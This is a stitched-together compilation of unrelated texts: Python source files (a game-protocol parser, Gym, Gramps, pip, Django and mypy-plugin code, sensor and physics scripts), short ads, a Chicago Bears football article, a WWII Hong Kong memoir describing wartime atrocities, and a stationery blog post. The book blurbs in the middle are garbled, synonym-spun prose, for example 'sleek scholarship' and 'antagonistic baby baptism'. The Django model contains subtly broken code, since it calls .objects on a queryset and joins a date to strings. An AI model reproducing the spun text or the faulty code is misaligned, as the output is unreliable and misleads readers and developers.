class ELGetActiveChannelsMessageParser(MessageParser):
"""parse the GET_ACTIVE_CHANNELS message"""
def parse(self, packet):
del self.connection.session.channels[:]
#Message structure: Active channel (1, 2 or 3), channel 1, channel 2, channel 3
chans = struct.unpack('<BIIII', packet.data)
i = 0
active = chans[0]
for c in chans[1:]:
if c != 0:
self.connection.session.channels.append(Channel(self.connection, c, i == active))
i += 1
#Event to notify about the change in the channel list
event = ELEvent(ELEventType(ELNetFromServer.GET_ACTIVE_CHANNELS))
event.data = {'connection': self.connection, 'channels': self.connection.session.channels}
return [event]
class ELBuddyEventMessageParser(MessageParser):
"""Parse the BUDDY_EVENT message"""
def parse(self, packet):
change = packet.data[0]# 1 is online, 0 offline
event = ELEvent(ELEventType(ELNetFromServer.BUDDY_EVENT))
event.data = {}
if change == 1:
#Buddy came online
buddy = str(strip_chars(packet.data[2:]))
self.connection.session.buddies.append(buddy)
event.data['event'] = 'online'
else:
#Buddy went offline
buddy = str(strip_chars(packet.data[1:]))
self.connection.session.buddies.remove(buddy)
event.data['event'] = 'offline'
event.data['name'] = buddy
event.data['connection'] = self.connection
return [event]
class ELLoginFailedParser(MessageParser):
"""Parse the LOG_IN_NOT_OK message"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.LOG_IN_NOT_OK))
event.data = {}
event.data['text'] = strip_chars(packet.data)
event.data['raw'] = packet.data
event.data['connection'] = self.connection
return [event]
class ELYouDontExistParser(MessageParser):
"""Parse the YOU_DONT_EXIST message"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.YOU_DONT_EXIST))
event.data = {}
event.data['connection'] = self.connection
return[event]
class ELLoginOKParser(MessageParser):
"""Parse the LOG_IN_OK message"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.LOG_IN_OK))
event.data = {}
event.data['connection'] = self.connection
self.connection.con_tries = 0
return [event]
class ELPingRequestParser(MessageParser):
"""Parse the PING_REQUEST message and respond with the appropriate message.
Does not raise an event, as this is strictly a protocol feature and not
something the application itself should worry about."""
def parse(self, packet):
# Send the message back as-is.
self.connection.send(ELPacket(ELNetToServer.PING_RESPONSE, packet.data))
return []
class ELNewMinuteParser(MessageParser):
def parse(self, packet):
if len(packet.data) != 2:
#TODO: Invalid message
return []
self.connection.session.game_time = struct.unpack('<H', packet.data)[0]
self.connection.session.game_time %= 360 #Clamp to six-hour time
event = ELEvent(ELEventType(ELNetFromServer.NEW_MINUTE))
event.data = {}
event.data['connection'] = self.connection
event.data['time'] = self.connection.session.game_time
return [event]
class ELChangeMapParser(MessageParser):
def parse(self, packet):
self.connection.session.current_map = packet.data
event = ELEvent(ELEventType(ELNetFromServer.CHANGE_MAP))
event.data = {}
event.data['connection'] = self.connection
event.data['map'] = self.connection.session.current_map
return [event]
|
Looking for Mary Nelva Ortiz Camarillo?
Are you Mary Nelva Ortiz Camarillo?
This is a placeholder page for Mary Nelva Ortiz Camarillo, which means this person is not currently on this site. We do suggest using the tools below to find Mary Nelva Ortiz Camarillo.
You are visiting the placeholder page for Mary Nelva Ortiz Camarillo. This page is here because someone used our placeholder utility to look for Mary Nelva Ortiz Camarillo. We created this page automatically in hopes Mary Nelva Ortiz Camarillo would find it. If you are not Mary Nelva Ortiz Camarillo, but are an alumni of Fowler High School Fowler, CA, register on this site for free now.
|
'''
GymMDPClass.py: Contains implementation for MDPs of the Gym Environments.
'''
# Python imports.
import random
import sys
import os
import random
from collections import defaultdict
# Other imports.
import gym
from simple_rl.mdp.MDPClass import MDP
from simple_rl.tasks.gym.GymStateClass import GymState
class GymMDP(MDP):
''' Class for Gym MDPs '''
def __init__(self, env_name='CartPole-v0', render=False, render_every_n_episodes=0):
'''
Args:
env_name (str)
render (bool): If True, renders the screen every time step.
render_every_n_epsiodes (int): @render must be True, then renders the screen every n episodes.
'''
# self.render_every_n_steps = render_every_n_steps
self.render_every_n_episodes = render_every_n_episodes
self.episode = 0
self.env_name = env_name
self.env = gym.make(env_name)
self.render = render
MDP.__init__(self, range(self.env.action_space.n), self._transition_func, self._reward_func, init_state=GymState(self.env.reset()))
def get_parameters(self):
'''
Returns:
(dict) key=param_name (str) --> val=param_val (object).
'''
param_dict = defaultdict(int)
param_dict["env_name"] = self.env_name
return param_dict
def _reward_func(self, state, action, next_state):
'''
Args:
state (AtariState)
action (str)
Returns
(float)
'''
return self.prev_reward
def _transition_func(self, state, action):
'''
Args:
state (AtariState)
action (str)
Returns
(State)
'''
obs, reward, is_terminal, info = self.env.step(action)
if self.render and (self.render_every_n_episodes == 0 or self.episode % self.render_every_n_episodes == 0):
self.env.render()
self.prev_reward = reward
self.next_state = GymState(obs, is_terminal=is_terminal)
return self.next_state
def reset(self):
self.env.reset()
self.episode += 1
def __str__(self):
return "gym-" + str(self.env_name)
|
Introducing LOCKRACK, a new product that allows you to spend less time loading and unloading, and more time doing what you want to enjoy most…recreating on the water!LOCKRACK is built to last. All components are rust resistant with an anodized aluminum base. There are four different LOCKRACK systems, each one custom made to suit your water sport of choice. From surfboards of all sizes to stand up paddleboards, surf skis, fishing kayaks and canoes, the LOCKRACK is designed to facilitate single person handling, even in extreme windy conditions.
Components built by Extreme Manufacturing, an ISO 9000 quality-compliant company.
** 65cm Base is geared for leisure SUPs, while the 50cm is better for narrow race boards.
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2011 Jerome Rapinat
# Copyright (C) 2011 Douglas S. Blank
# Copyright (C) 2011 Benny Malengier
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# gen.filters.rules/_MatchesSourceConfidenceBase.py
# $Id$
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ...const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from . import Rule
#-------------------------------------------------------------------------
# "Confidence level"
# Sources of an attribute of an event are ignored
#-------------------------------------------------------------------------
class MatchesSourceConfidenceBase(Rule):
"""Objects with a specific confidence level on 'direct' Source references"""
labels = ['Confidence level:']
name = 'Object with at least one direct source >= <confidence level>'
description = "Matches objects with at least one direct source with confidence level(s)"
category = _('Citation/source filters')
def apply(self, db, obj):
required_conf = int(self.list[0])
for citation_handle in obj.get_citation_list():
citation = db.get_citation_from_handle(citation_handle)
if required_conf <= citation.get_confidence_level():
return True
return False
|
Tooth colored crown on front tooth.
Patient needed a crown on front tooth. We had our lab technician come to crown delivery appointment and match crown color exactly to her natural teeth. This makes crown look natural and blends right in with her other teeth.
|
from __future__ import absolute_import
import logging
from email.parser import FeedParser
from pip._vendor import pkg_resources
from pip._vendor.packaging import specifiers, version
from pip._internal.exceptions import NoneMetadataError
from pip._internal.utils.misc import display_path
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from email.message import Message
from pip._vendor.pkg_resources import Distribution
logger = logging.getLogger(__name__)
def check_requires_python(requires_python, version_info):
# type: (Optional[str], Tuple[int, ...]) -> bool
"""
Check if the given Python version matches a "Requires-Python" specifier.
:param version_info: A 3-tuple of ints representing a Python
major-minor-micro version to check (e.g. `sys.version_info[:3]`).
:return: `True` if the given Python version satisfies the requirement.
Otherwise, return `False`.
:raises InvalidSpecifier: If `requires_python` has an invalid format.
"""
if requires_python is None:
# The package provides no information
return True
requires_python_specifier = specifiers.SpecifierSet(requires_python)
python_version = version.parse('.'.join(map(str, version_info)))
return python_version in requires_python_specifier
def get_metadata(dist):
# type: (Distribution) -> Message
"""
:raises NoneMetadataError: if the distribution reports `has_metadata()`
True but `get_metadata()` returns None.
"""
metadata_name = 'METADATA'
if (isinstance(dist, pkg_resources.DistInfoDistribution) and
dist.has_metadata(metadata_name)):
metadata = dist.get_metadata(metadata_name)
elif dist.has_metadata('PKG-INFO'):
metadata_name = 'PKG-INFO'
metadata = dist.get_metadata(metadata_name)
else:
logger.warning("No metadata found in %s", display_path(dist.location))
metadata = ''
if metadata is None:
raise NoneMetadataError(dist, metadata_name)
feed_parser = FeedParser()
# The following line errors out if with a "NoneType" TypeError if
# passed metadata=None.
feed_parser.feed(metadata)
return feed_parser.close()
def get_requires_python(dist):
# type: (pkg_resources.Distribution) -> Optional[str]
"""
Return the "Requires-Python" metadata for a distribution, or None
if not present.
"""
pkg_info_dict = get_metadata(dist)
requires_python = pkg_info_dict.get('Requires-Python')
if requires_python is not None:
# Convert to a str to satisfy the type checker, since requires_python
# can be a Header object.
requires_python = str(requires_python)
return requires_python
def get_installer(dist):
# type: (Distribution) -> str
if dist.has_metadata('INSTALLER'):
for line in dist.get_metadata_lines('INSTALLER'):
if line.strip():
return line.strip()
return ''
|
Nagy-Trubisky: A Match Made in Heaven?
With Matt Nagy now the head coach of the Chicago Bears his primary goal will be to implement his offense and help develop second-year quarterback Mitch Trubisky.
Nagy, an assistant to noted “quarterback whisperer” Andy Reid, played a big part in incorporating college-style run-pass options (RPO) into the Chiefs offense this past year.
These will presumably be a sizable part of the playbook Nagy brings with him which should help his primary goal of developing Trubisky into a top-tier quarterback as he ran similar plays in college.
Let’s take a look at how Nagy will be able to set-up Trubisky for success.
A successful running game is a quarterback and offensive line’s best friend. We all saw this against the Lions the first time they played and the Bengals, two of Trubisky’s better games this season.
Nonetheless, many of us know that the Bears used a lot of heavy-run formations last year to run the ball in 13 personnel (one running back, three tight ends) or 22 personnel (a running back, a fullback, and two tight ends) into a loaded box.
Nagy was also willing to use his quarterback in the run game through zone reads. We saw this some of this last year in Chicago, but not often enough especially in short yardage situations, so this is great for Trubisky.
Prior to the draft, there were some comparisons made between Trubisky and Smith, and while I do not disagree, I think Trubisky has more arm strength and is slightly more athletic. However, Trubisky clearly has the accuracy to thrive in the quick passing West Coast offense that Nagy employs.
It is hard to tell from statistics due to the predictable nature of the Bears’ offense, but Trubisky was clearly more comfortable in the shotgun than under center. Unfortunately for the quarterback, the Bears did not tailor the offense to his strengths.
The splits below explain all you need to know.
In his first game calling plays, Nagy did a good job of mixing RPOs, quick-rhythm throws, and threw in quite a few deep shots as well. Trubisky did a good job of throwing the deep ball last season when given the opportunity, but the Bears offense was not balanced enough to give him time to sit in the pocket while the routes developed.
The Chiefs’ offense was predicated on quick throws that allowed receivers to gain yards after the catch.
Another thing Nagy did a good job of was moving the pocket with Smith, and one of the first things we all saw with Trubisky was just how deadly accurate he can be on the move.
These are all high percentage throws we know Trubisky can make.
In Nagy’s offense, getting open is more important than making contested catches. Look for Ryan Pace to add quick and agile receivers who are good route-runners to pair with Trubisky and Nagy.
While we do not know exactly what Nagy’s system will be as he was doing the play calling for Reid’s offense, it was obvious that Nagy likes getting the ball to playmakers in space.
It will be interesting to see what Nagy brings with him from Reid and what his identity as a play caller will be. It is not far-fetched to think that Nagy and Trubisky can be a match made in heaven.
I liked what I read a lot. Very good to hear that it looks to be a match made in heaven for Trubisky. Is there anything from the plays that Nagy drew up that gives you pause? For instance, weaknesses from Mitch that Nagy may struggle to cover up?
Nagy really seems to like the quick out to the left side if defenders are playing off and as far as weaknesses for Trubisky, he did have trouble with throws outside the numbers to his left side this year because his hips tend to fly open when throwing to his left. Nagy being the quarterback technician that he is though I am hopeful that he will be able to fix that specific weakness.
So do you think wide receivers like Jarvis Landry and Calvin Ridley fit the bill for quick and agile routerunners? Instead of contested ball receivers like a Courtland Sutton?
Using the players you mentioned I think Calvin Ridley would be a great fit. Alabama used him on a lot of quick tunnel screens and bubble screens as well as the deep routes that Nagy likes to use (think sluggos and out-and-ups). He’s also versatile in the sense that he can line up in the slot or as a boundary receiver. I don’t think Landry is as much of a fit just because yards after catch isn’t necessarily his thing or his greatest attribute plus the price tag will be a big one. Even going back to college tape Mitch was never one to throw jump balls to his wide receivers so I don’t think of Sutton as a great fit either. One name I think will be mentioned a lot is Paul Richardson of the Seattle Seahawks. He’s really quick, can get separation, and I could see him thriving in this offense. He’s also a pretty great deep threat as well which would be nice for Nagy and our new offensive coordinator Mark Helfrich.
|
from django.db import models
from .Resource import *
class PublicationManager(models.Manager):
def addPublication(self, request):
""" add new publication """
R = Resource.objects.addResource(request)
P = Publication(
resource=R,
title=request['title'],
authors=request['authors'],
publicationDate=request['publicationDate'],
organization=request['organization'],
link=request['link']
)
P.save()
return P
def editPublication(self, request):
""" edit existing publication """
R = Resource.objects.editResource(request)
P = Publication.objects.get(resource=R)
P.title = request['title']
P.authors = request['authors']
P.publicationDate = request['publicationDate']
P.organization = request['organization']
P.link = request['link']
P.save()
return P
def getDocumentById(self, request):
""" get publication details on the basis of resource ID """
R = Resource.objects.getResourceById(request)
P = Publication.objects.get(resource=R)
return P
def retrievePublications(self, request):
""" retrieve details of all the publications depending on the request """
""" note: courseId is compulsory field; title, authors, organization, link are optional fields """
R = Resource.objects.retrieveResources(request)
P = Publication.objects.filter(pk__in=R)
if 'title' in request.keys():
P = P.objects.filter(title=request['title'])
if 'authors' in request.keys():
P = P.objects.filter(authors=request['authors'])
if 'organization' in request.keys():
P = P.objects.filter(organization=request['organization'])
if 'link' in request.keys():
P = P.objects.filter(link=request['link'])
return P
def deletePublication(self, request):
""" deletes existing publication """
R = Resource.objects.getResourceById(request)
P = Publication.objects.get(resource=R)
P.delete()
R.delete()
return P
class Publication(models.Model):
# Resource
resource = models.OneToOneField(Resource, on_delete=models.CASCADE, primary_key=True)
# Title
title = models.CharField(max_length=500, blank=False, null=False)
# Authors
authors = models.CharField(max_length=250)
# Publication date
publicationDate = models.DateField(editable=True, auto_now=False, auto_now_add=False)
# Organization
organization = models.CharField(max_length=100)
# Link
link = models.URLField()
objects = PublicationManager()
def __str__(self):
return self.title + " - " + self.authors + " - " + self.publicationDate
|
This resource has 15 worksheets of fraction word problems. That's 120 word problems with answer sheets.
You may also be interested in Decimal Word Problems and Rates and Ratios Word Problems!
|
'''Check if the new sphere mobility is positive definite for all distance'''
import numpy as np
import sys
import sphere as sph
sys.path.append('..')
from fluids import mobility as mb
from quaternion_integrator.quaternion import Quaternion
if __name__ == '__main__':
# Parameters
points = 1000
distance = sph.A * 2
orientation = Quaternion([1., 0., 0., 0.])
location = [ [0., 0., distance] ]
dd = (distance - sph.A * 0.9) / float(points)
distance = distance + dd
# Loop for distances
if(1):
for i in range(points):
distance -= dd
#print i, distance
location = [ [0., 0., distance] ]
mobility = sph.sphere_mobility(location, orientation)
data = str(distance/sph.A) + ' '
data += str(mobility[0, 0] * (6.0*np.pi*sph.ETA * sph.A)) + ' '
data += str(mobility[2, 2] * (6.0*np.pi*sph.ETA * sph.A)) + ' '
data += str(mobility[3, 3] * (8.0*np.pi*sph.ETA * sph.A**3)) + ' '
data += str(mobility[5, 5] * (8.0*np.pi*sph.ETA * sph.A**3)) + ' '
data += str(mobility[0, 4] * (6.0*np.pi*sph.ETA * sph.A**2))
print data
mobility_half = np.linalg.cholesky(mobility)
print "#END"
|
it's enormously paradoxical that John Milton - who antagonistic baby baptism, supported regicide, defended divorce and licensed of polygamy - can be heard as a voice of orthodoxy. but sleek scholarship has usually understated or defined away his heretical critiques. This quantity investigates facets of Milton's works inconsistent with traditional ideals, even if when it comes to seventeenth-century theology or the typical assumptions of Milton students. individuals situate Milton and his writings inside his particular old conditions, paying unique cognizance to Milton's pragmatic place inside of seventeenth-century spiritual controversy. The volume's 4 sections care for heretical theology, heresy's results, heresy and neighborhood, and readers of heresy; their universal premise is that Milton, as poet, philosopher and public servant, eschewed set ideals and thought of indeterminacy and uncertainty as basic to human existence.
The literary 'middle ground', as soon as brushed off by way of academia as insignificant, is the location of strong anxieties approximately cultural authority that proceed to this present day. briefly, the middlebrow concerns . those essays learn the prejudices and aspirations at paintings within the 'battle of the brows', and convey that cultural worth is often relative and situational.
Interpreting a wealthy new new release of Latin American writers, this assortment deals new views at the present prestige of Latin American literature within the age of globalization. Authors explored are from the increase and Postboom sessions, together with those that mix social preoccupations, like drug trafficking, with aesthetic ones.
The sport of chess was once wildly well known within the center a while, lots in order that it turned a major inspiration paradigm for thinkers and writers who applied its vocabulary and imagery for commentaries on struggle, politics, love, and the social order. during this number of essays, students examine chess texts from a variety of traditions – English, French, German, Latin, Persian, Spanish, Swedish, and Catalan – and argue that wisdom of chess is key to knowing medieval tradition.
Whereas Kierkegaard might be identified most sensible as a non secular philosopher and thinker, there's an unmistakable literary aspect in his writings. He usually explains advanced ideas and concepts through the use of literary figures and motifs that he may possibly imagine his readers might have a few familiarity with. This measurement of his concept has served to make his writings way more renowned than these of alternative philosophers and theologians, yet whilst it has made their interpretation extra complicated.
|
#!/usr/bin/python
import sys
import serial
from serial.tools import list_ports
from mpudata import quat_packet, debug_packet, data_packet
import os
import time
import numpy as np
import matplotlib.pyplot as plt
import euclid
class mpu9150interface(object):
def __init__(self):
#self.connect()
#self.read()
print "init"
self.SIZE = 100
self.x_list = [None]*self.SIZE
self.y_list = [None]*self.SIZE
self.z_list = [None]*self.SIZE
self.mag_list = [None]*self.SIZE
self.quat_list = [None]*self.SIZE
self.accel_list = [None]*self.SIZE
self.calibrated_list = [None] * self.SIZE
self.port="null"
self.gravity = np.array([0,0,0])
def connect(self):
ports = list(self.serial_ports())
for idx,val in enumerate(ports):
print str(idx) + ". "+val
num = raw_input("Select the port for the MPU-9150 : ")
self.port = ports[int(num)]
self.s = serial.Serial(self.port , 115200 , timeout=1)
#self.ser.open()
if self.s.isOpen():
print "Connected..."
else:
self.s.open()
def send(self, str):
for i in range(0,len(str)):
self.s.write(str[i])
time.sleep(0.1)
def write(self):
command = ""
while command != "q":
command = raw_input("To Mpu>")
self.send(command)
def serial_ports(self):
"""
Returns a generator for all available serial ports
"""
if os.name == 'nt':
# windows
for i in range(256):
try:
s = serial.Serial(i)
s.close()
yield 'COM' + str(i + 1)
except serial.SerialException:
pass
else:
# unix
for port in list_ports.comports():
yield port[0]
def zeroing(self):
self.index=0
while (self.index <2 ):
self.read_debug()
#print self.index,
self.gravity = np.array([ self.data[0],self.data[1] ,self.data[2] ])
print self.gravity
def read_debug(self):
NUM_BYTES = 23
p = None
time.sleep(0.01)
while self.s.inWaiting() >= NUM_BYTES:
if self.index_accel >= self.SIZE:
break
rs = self.s.read(NUM_BYTES)
if ord(rs[0]) == ord('$'):
pkt_code = ord(rs[1])
#print "."
#print "\r"+str(pkt_code),
if pkt_code == 1:
d = debug_packet(rs)
d.display()
elif pkt_code == 2:
p = quat_packet(rs)
self.quat_list[self.index_quat] = p
self.index_quat = self.index_quat + 1
#p.display()
print "+"
elif pkt_code == 3:
d = data_packet(rs)
#d.display()
self.data = d.data
datatype = d.type
if datatype ==0:
#self.index = self.index+1
#print self.index
self.accel_list[self.index_accel] = d
self.x_list[self.index_accel] = d.data[0]
self.y_list[self.index_accel] = d.data[1]
self.z_list[self.index_accel] = d.data[2]
vec = [d.data[0] , d.data[1], d.data[2]]
vec = vec - self.gravity
norm = np.linalg.norm(vec)
norm = norm-1
self.mag_list[self.index_accel] = norm
self.index_accel = self.index_accel +1
print "-",
sys.stdout.flush()
def read(self):
self.index_quat = 0
self.index_accel = 0
print "logging..."
n=0
while( self.index_accel < (self.SIZE-1)):
self.read_debug()
print self.index_accel,
sys.stdout.flush()
self.s.close()
print "plotting..."
#plt.plot(self.mag_list)
#plt.show()
for i in range(0,self.SIZE):
#print i
q = self.quat_list[i]
d = self.accel_list[i]
if (q is not None) and (d is not None):
#if not isinstance(q,None) and not isinstance(d,None)
#print d
v = euclid.Vector3(d.data[0], d.data[1], d.data[2])
quat = q.to_q().conjugated()
#print quat
#print v
###########
q = quat*v
self.calibrated_list[i] = q
if __name__ =="__main__":
mpu =mpu9150interface()
if (len(sys.argv) == 2):
if sys.argv[1] == "setup":
mpu.connect()
mpu.write()
mpu.s.close()
else:
mpu.s = serial.Serial(sys.argv[1],115200, timeout =1)
print mpu.s
if(mpu.s.isOpen()):
print "connected..."
#mpu.s = serial.Serial("/dev/cu.usbmodemfa141",115200, timeout =1)
#mpu.read()
#raw_input("press enter to zeroing...")
#mpu.zeroing()
raw_input("press enter to start...")
mpu.read()
|
I am an old man now, however I was born in Hong kong where I lived until I was nine years of age. My Parents worked in the Colony pre war and post war. My mother and elder brother escaped to Australia before the Japs invaded. My father was in the HKVDC. He never spoke much about what went on except to tell me little bits about the surrender. They fought like tigers with units of the Punjab Rifles. They fell back from Kowloon, the C/O of the Punjabies pulled rank on dad and told him to take his men over to Victoris Island as people would know it,which he did. Jap Destroyers sailed round and round, shelling them day & night. Water was very short towards the end and he told me they drank from toilets and cisterns,not destroyed. The Japs finally landed and the fighting became hand to hand. From what I can gather, they were a pretty rough, “raggle taggle” group of all sorts of other regiments. Anyway,the Japs pushed them towards the top of the Peak and the situation became hopeless. The Govenor who’s name I shamefully admit escapes me said at a meeting. To continue would be a waste of life so, we must surrender! Which of course they did.
We now know that to a Jap, if you surrender, you are lower than a dog!!! That’s when the beating’s began. Dad was alway’s very proud of the Chinese men in his platoon, as a civillian he was a Health Inspector and his men were the koolies in his department. Their courage was outstanding he said and was always ashamed at their lack of recognition after the war. While in Sham Shei Po Camp ( forgive spelling), this is one of the thing’s he saw. I’ll tell it to you as he told it to me.
A young Chinese girl in a Bath chair ( wheel chair) was throwing penney Buns (small bread rolls) over the wire to the prisoners. An order was given and she was dragged out of her chair and into the camp. There she was humiliated, kicked and beaten & finally butchered, in front of the men. I believe some who verbally protested were shot! He and others were taken to Sendai in Japan and made to work as coal miners, slaves to the Emperor of Japan. A lot of the chaps he was sent with were Canadians. He survived the war and returned to HK and worked in the health department until he retired in 1957 when we came back to the UK. After the war, my brother, 18 years older than me and his friend Bobby Stott, found two bodies of Canadian soldiers in a pill box in what I can only imagine were ” The New Territories”. They reported the find of course. As a small boy, I can recall dad takeing me to a holding place of some sort. It was full of Japanese vehicles, Tanks and so on, which he allowed me to stand on. From my friends apartment at a place called King’s Park, I could see out over a bay where there were two Jap Destroyers which had been sunk. I very much doubt if there is much left of my Hong Kong. I went to the Kowloon Junior school and my friend was a South African callled Van der Lin, his dad was a doctor and they lived in a beautiful bungalow on top of a hill, I cannot remember where though? An American airman used to visit his parents every single year. The japs shot him and his companion down, both bailed out. One of them saw some young Chinese girls who had been stripped naked and made to stand in front of a white wall, holding a concrete block over their heads, in the heat of the sun. The Americans bombed them so I was told. To drop the block meant being bayoneted !!! One airman was caught, tied behind a truck and dragged to his death through the streets? The other broke his leg on landing in the jungle. Doctor Van der Lin found him, hid him and more to the point, treated his leg.That’s why he visited every year. I believe they lived among the Chinese in a fishing village during the occupation. I’m sure there are many stories like this which have gone untold. I returned to Hong Kong in 1966/67 in the Royal Navy. I am disabled now so a long flight is out of the question, however, my mind often takes me back to my beloved Hueng Ha! Again please forgive spelling, but you know what I mean.
|
from collections import OrderedDict
from typing import List, Optional, Sequence, Type
from django.core.exceptions import FieldError
from django.db.models.base import Model
from django.db.models.fields.related import RelatedField
from django.db.models.fields.reverse_related import ForeignObjectRel
from mypy.nodes import Expression, NameExpr
from mypy.plugin import FunctionContext, MethodContext
from mypy.types import AnyType, Instance
from mypy.types import Type as MypyType
from mypy.types import TypeOfAny
from mypy_django_plugin.django.context import (
DjangoContext, LookupsAreUnsupported,
)
from mypy_django_plugin.lib import fullnames, helpers
def _extract_model_type_from_queryset(queryset_type: Instance) -> Optional[Instance]:
for base_type in [queryset_type, *queryset_type.type.bases]:
if (len(base_type.args)
and isinstance(base_type.args[0], Instance)
and base_type.args[0].type.has_base(fullnames.MODEL_CLASS_FULLNAME)):
return base_type.args[0]
return None
def determine_proper_manager_type(ctx: FunctionContext) -> MypyType:
default_return_type = ctx.default_return_type
assert isinstance(default_return_type, Instance)
outer_model_info = helpers.get_typechecker_api(ctx).scope.active_class()
if (outer_model_info is None
or not outer_model_info.has_base(fullnames.MODEL_CLASS_FULLNAME)):
return default_return_type
return helpers.reparametrize_instance(default_return_type, [Instance(outer_model_info, [])])
def get_field_type_from_lookup(ctx: MethodContext, django_context: DjangoContext, model_cls: Type[Model],
*, method: str, lookup: str) -> Optional[MypyType]:
try:
lookup_field = django_context.resolve_lookup_into_field(model_cls, lookup)
except FieldError as exc:
ctx.api.fail(exc.args[0], ctx.context)
return None
except LookupsAreUnsupported:
return AnyType(TypeOfAny.explicit)
if ((isinstance(lookup_field, RelatedField) and lookup_field.column == lookup)
or isinstance(lookup_field, ForeignObjectRel)):
related_model_cls = django_context.get_field_related_model_cls(lookup_field)
if related_model_cls is None:
return AnyType(TypeOfAny.from_error)
lookup_field = django_context.get_primary_key_field(related_model_cls)
field_get_type = django_context.get_field_get_type(helpers.get_typechecker_api(ctx),
lookup_field, method=method)
return field_get_type
def get_values_list_row_type(ctx: MethodContext, django_context: DjangoContext, model_cls: Type[Model],
flat: bool, named: bool) -> MypyType:
field_lookups = resolve_field_lookups(ctx.args[0], django_context)
if field_lookups is None:
return AnyType(TypeOfAny.from_error)
typechecker_api = helpers.get_typechecker_api(ctx)
if len(field_lookups) == 0:
if flat:
primary_key_field = django_context.get_primary_key_field(model_cls)
lookup_type = get_field_type_from_lookup(ctx, django_context, model_cls,
lookup=primary_key_field.attname, method='values_list')
assert lookup_type is not None
return lookup_type
elif named:
column_types: 'OrderedDict[str, MypyType]' = OrderedDict()
for field in django_context.get_model_fields(model_cls):
column_type = django_context.get_field_get_type(typechecker_api, field,
method='values_list')
column_types[field.attname] = column_type
return helpers.make_oneoff_named_tuple(typechecker_api, 'Row', column_types)
else:
# flat=False, named=False, all fields
field_lookups = []
for field in django_context.get_model_fields(model_cls):
field_lookups.append(field.attname)
if len(field_lookups) > 1 and flat:
typechecker_api.fail("'flat' is not valid when 'values_list' is called with more than one field", ctx.context)
return AnyType(TypeOfAny.from_error)
column_types = OrderedDict()
for field_lookup in field_lookups:
lookup_field_type = get_field_type_from_lookup(ctx, django_context, model_cls,
lookup=field_lookup, method='values_list')
if lookup_field_type is None:
return AnyType(TypeOfAny.from_error)
column_types[field_lookup] = lookup_field_type
if flat:
assert len(column_types) == 1
row_type = next(iter(column_types.values()))
elif named:
row_type = helpers.make_oneoff_named_tuple(typechecker_api, 'Row', column_types)
else:
row_type = helpers.make_tuple(typechecker_api, list(column_types.values()))
return row_type
def extract_proper_type_queryset_values_list(ctx: MethodContext, django_context: DjangoContext) -> MypyType:
# called on the Instance, returns QuerySet of something
assert isinstance(ctx.type, Instance)
assert isinstance(ctx.default_return_type, Instance)
model_type = _extract_model_type_from_queryset(ctx.type)
if model_type is None:
return AnyType(TypeOfAny.from_omitted_generics)
model_cls = django_context.get_model_class_by_fullname(model_type.type.fullname)
if model_cls is None:
return ctx.default_return_type
flat_expr = helpers.get_call_argument_by_name(ctx, 'flat')
if flat_expr is not None and isinstance(flat_expr, NameExpr):
flat = helpers.parse_bool(flat_expr)
else:
flat = False
named_expr = helpers.get_call_argument_by_name(ctx, 'named')
if named_expr is not None and isinstance(named_expr, NameExpr):
named = helpers.parse_bool(named_expr)
else:
named = False
if flat and named:
ctx.api.fail("'flat' and 'named' can't be used together", ctx.context)
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, AnyType(TypeOfAny.from_error)])
# account for possible None
flat = flat or False
named = named or False
row_type = get_values_list_row_type(ctx, django_context, model_cls,
flat=flat, named=named)
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, row_type])
def resolve_field_lookups(lookup_exprs: Sequence[Expression], django_context: DjangoContext) -> Optional[List[str]]:
field_lookups = []
for field_lookup_expr in lookup_exprs:
field_lookup = helpers.resolve_string_attribute_value(field_lookup_expr, django_context)
if field_lookup is None:
return None
field_lookups.append(field_lookup)
return field_lookups
def extract_proper_type_queryset_values(ctx: MethodContext, django_context: DjangoContext) -> MypyType:
# called on QuerySet, return QuerySet of something
assert isinstance(ctx.type, Instance)
assert isinstance(ctx.default_return_type, Instance)
model_type = _extract_model_type_from_queryset(ctx.type)
if model_type is None:
return AnyType(TypeOfAny.from_omitted_generics)
model_cls = django_context.get_model_class_by_fullname(model_type.type.fullname)
if model_cls is None:
return ctx.default_return_type
field_lookups = resolve_field_lookups(ctx.args[0], django_context)
if field_lookups is None:
return AnyType(TypeOfAny.from_error)
if len(field_lookups) == 0:
for field in django_context.get_model_fields(model_cls):
field_lookups.append(field.attname)
column_types: 'OrderedDict[str, MypyType]' = OrderedDict()
for field_lookup in field_lookups:
field_lookup_type = get_field_type_from_lookup(ctx, django_context, model_cls,
lookup=field_lookup, method='values')
if field_lookup_type is None:
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, AnyType(TypeOfAny.from_error)])
column_types[field_lookup] = field_lookup_type
row_type = helpers.make_typeddict(ctx.api, column_types, set(column_types.keys()))
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, row_type])
|
Even better, she was really nice- way nicer than I probably would have been after signing at least 300 books (by the time I was able to meet her) and knowing there were probably around another 200 to go. I can't imagine how wonderful a manicure/hand massage would feel after holding a pen for that long!
I brought her a gift of my stationery to say thank you for everything she has done and as a welcome gift for coming to Atlanta. I really hope she enjoys and likes my work. Martha has been such an inspiration for so many and I hope she realizes the impact she makes in so many people's lives. For me, knowing Martha was able to become who she is today not only inspired me, but also gave me the courage to develop my own stationery line. And seeing how many other people took over 3 hours out of their day just to meet her shows that I'm not alone in how I feel!
